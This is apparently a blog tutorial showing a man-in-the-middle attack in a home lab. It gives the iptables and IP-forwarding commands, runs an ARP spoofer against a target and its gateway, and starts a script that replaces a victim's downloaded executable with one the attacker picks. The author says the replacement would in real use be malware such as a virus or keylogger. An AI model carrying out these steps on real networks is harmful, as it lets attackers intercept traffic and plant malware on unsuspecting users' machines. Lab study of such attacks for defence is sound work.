Hello friends, today I want you to demonstrate how file_interceptor created in the previous post can be used to replace target downloaded file.

My environment contains KaliLinux VM(Hacker) and Windows 10(Target).

As usually to perform man in the middle we need to use arp spoofer, this allows us to receive all target packets.

First what needs to be done is to enable port forwarding. Execute this command on your Linux VM:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -I FORWARD -j NFQUEUE --queue-num 0

This command enables port forwarding and creates a queue which can be used to catch target packets.

Let’s check ARP table before execution of apr spoofer:

Let’s execute arp spoofer can be executed:

python arp_spoofing.py -t 10.0.2.4 -g 10.0.2.1
[+] Packets sent: 8

Where -t 10.0.2.4 — Target IP address and -g 10.0.2.1 — gateway IP address.

And check ARP table one more time:

Now our Kali Linux will catch all target packets.

Now we can start file interceptor:

python file_interceptor.py -u https://www.win-rar.com/fileadmin/winrar-versions/winrar/wrar560.exe

-u this is url to file. When target will try to download an exe file from the internet, this file will be replaced with our file. Here I am using winrar installation file, but in real life example it is should be some malware software like virus, keyloger or something similar.

Now let’s open target VM and try to download exe file:

As you can see from this picture target trying to get fbsetup-full.exe but really receiving wrar560.exe

You can check full code on my GitHub

Check my blog — http://www.devopslife.xyz

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade